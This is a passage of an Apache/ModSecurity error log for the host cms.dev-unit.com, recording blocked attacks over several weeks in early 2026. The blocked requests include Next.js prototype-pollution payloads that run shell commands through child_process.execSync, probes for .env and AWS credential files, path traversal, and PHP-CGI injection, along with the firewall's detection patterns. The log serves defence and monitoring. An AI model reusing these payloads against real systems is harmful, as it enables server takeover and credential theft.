"2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1769600793',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1769600793',{'timeo..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXn2-FhOp7ZZChWKpwtDJwAAAVM"], referer: https://cms.dev-unit.com [Wed Jan 28 14:08:19.768722 2026] [:error] [pid 6774:tid 6844] [client 18.195.188.148:56916] [client 18.195.188.148] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/apps"] [unique_id "aXn8M1hOp7ZZChWKpwtR-gAAAVU"] [Thu Jan 29 15:30:39.250562 2026] [:error] [pid 14971:tid 15063] [client 185.177.72.30:17014] [client 185.177.72.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/env.bak"] [unique_id "aXtg_6i0irOA7iaifXYykwAAAIA"] [Wed Feb 04 11:19:43.674136 2026] [:error] [pid 23343:tid 23354] [client 185.177.72.30:6972] [client 185.177.72.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/env.bak"] [unique_id "aYMPL5KzqAe6oIsD2HhFxQAAAMk"] [Thu Feb 05 00:00:42.329106 2026] [:error] [pid 11103:tid 11110] [client 85.11.167.4:49148] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1770242477_3309',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1770242477_330..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aYPBisS9A8z0dGN8UF8DAQAAAQA"], referer: https://cms.dev-unit.com [Thu Feb 05 09:08:34.553444 2026] [core:error] [pid 28561:tid 28564] (5)Input/output error: [client 45.148.10.238:60386] AH00036: access to /.env failed (filesystem path '/home') [Thu Feb 05 09:08:34.587319 2026] [core:error] [pid 28468:tid 28484] (5)Input/output error: [client 45.148.10.238:60402] AH00036: access to /.aws/credentials failed (filesystem path '/home') [Thu Feb 05 09:08:34.597699 2026] [core:error] [pid 2383:tid 2427] (5)Input/output error: [client 45.148.10.238:60418] AH00036: access to /aws.env failed (filesystem path '/home') [Thu Feb 05 10:19:56.255754 2026] [core:error] [pid 28468:tid 28478] (5)Input/output error: [client 185.93.89.136:59100] AH00036: access to /.git/HEAD failed (filesystem path '/home') [Thu Feb 05 11:43:51.471671 2026] [core:error] [pid 2383:tid 2423] (5)Input/output error: [client 195.178.110.54:54636] AH00036: access to / failed (filesystem path '/home') [Thu Feb 05 20:59:43.206670 2026] [:error] [pid 2161:tid 2237] [client 209.97.161.2:65118] [client 209.97.161.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:akaalb_uspop_staging. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within REQUEST_COOKIES:akaalb_uspop_staging: 2147483647~op=uspop_staging:uss-p-ngx7-2|~rv=5~m=uss-p-ngx7-2:0|~os=6fe23eaf334205d9e28642ffc227db61~id=ec12a6eaf783aa398595e88a68fef699"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aYTonr7D-EufUMyJ0JiFxgAAAJU"], referer: https://cmo.gvh.mybluehost.me//blog//wp-login.php [Fri Feb 06 14:12:48.719508 2026] [:error] [pid 10241:tid 10286] [client 85.11.167.4:59492] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1770379969_3525',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1770379969_352..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aYXawHWLTcm1yGnO9p1CTQAAAZA"], referer: https://cms.dev-unit.com [Fri Feb 06 14:12:48.846134 2026] [:error] [pid 3797:tid 3817] [client 85.11.167.4:59494] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1770379969',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1770379969',{'timeo..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aYXawFrG6MBA5FWAhmy5pAAAAM0"], referer: https://cms.dev-unit.com [Tue Feb 10 18:11:01.014555 2026] [:error] [pid 9330:tid 9335] [client 20.43.35.7:17848] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Feb 10 18:11:05.170098 2026] [:error] [pid 9330:tid 9352] [client 20.43.35.7:51170] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/mariju.php [Tue Feb 10 18:11:16.366988 2026] [:error] [pid 732:tid 755] [client 20.43.35.7:1914] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Feb 10 18:11:34.357863 2026] [:error] [pid 9330:tid 9347] [client 20.43.35.7:17829] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Feb 11 03:24:18.570079 2026] [:error] [pid 17831:tid 17860] [client 45.148.10.159:42396] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.svn/wc.db"] [unique_id "aYvaQjzFhtoa3tKUW3SkrAAAAZg"] [Fri Feb 20 07:37:13.355096 2026] [:error] [pid 25368:tid 25391] [client 163.7.3.41:54194] [client 163.7.3.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/apps"] [unique_id "aZfzCRYI-0eHkwyuwt-85QAAAQs"] [Sat Feb 21 20:53:46.998002 2026] [:error] [pid 12371:tid 12389] [client 52.231.66.246:57837] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Thu Feb 26 00:55:46.416462 2026] [authz_core:error] [pid 25918:tid 26018] [client 206.81.24.227:57722] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Thu Feb 26 00:55:46.562472 2026] [authz_core:error] [pid 25916:tid 26000] [client 142.93.129.190:33962] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Thu Feb 26 00:56:00.649910 2026] [:error] [pid 25918:tid 26018] [client 206.81.24.227:56740] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aZ9-AIx00skzHN5jRIhAhAAAAIU"] [Thu Feb 26 00:56:00.671423 2026] [:error] [pid 25918:tid 26010] [client 142.93.129.190:41532] [client 142.93.129.190] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aZ9-AIx00skzHN5jRIhAhQAAAIE"] [Thu Feb 26 06:28:57.873701 2026] [:error] [pid 25947:tid 25986] [client 18.202.217.12:58208] [client 18.202.217.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('(whoami) 2>&1 || true',{'timeout':5000}).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'), {digest: found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aZ_MCRFt5xbrUjTtutLlFAAAAEg"] [Fri Feb 27 04:41:14.797186 2026] [:error] [pid 19414:tid 19495] [client 163.7.4.249:32878] [client 163.7.4.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaEESol2XTe6vwfq2aEPPwAAABQ"] [Fri Feb 27 06:13:09.784545 2026] [:error] [pid 19590:tid 19611] [client 163.7.4.249:52872] [client 163.7.4.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaEZ1dky4CVhPBJ_vGvBewAAANM"] [Fri Feb 27 07:39:55.150946 2026] [:error] [pid 21508:tid 21534] [client 185.177.72.52:15600] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/env.bak"] [unique_id "aaEuK8_7XKceGHnFn7KMBQAAAQw"] [Fri Feb 27 07:39:59.557976 2026] [:error] [pid 21508:tid 21524] [client 185.177.72.52:58094] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/env.bak"] [unique_id "aaEuL8_7XKceGHnFn7KMqgAAAQI"] [Fri Feb 27 07:40:00.065746 2026] [:error] [pid 21508:tid 21529] [client 185.177.72.52:58110] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/pms"] [unique_id "aaEuMM_7XKceGHnFn7KMwQAAAQc"] [Fri Feb 27 07:40:14.714947 2026] [access_compat:error] [pid 21508:tid 21524] [client 185.177.72.52:13026] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/.env [Fri Feb 27 07:40:15.901278 2026] [:error] [pid 21508:tid 21523] [client 185.177.72.52:13080] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/config/settings.ini"] [unique_id "aaEuP8_7XKceGHnFn7KNsgAAAQE"] [Fri Feb 27 07:40:18.805467 2026] [:error] [pid 19590:tid 19600] [client 185.177.72.52:13204] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/env.backup"] [unique_id "aaEuQtky4CVhPBJ_vGvrfQAAAMg"] [Fri Feb 27 07:40:22.514481 2026] [:error] [pid 21508:tid 21524] [client 185.177.72.52:13388] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ 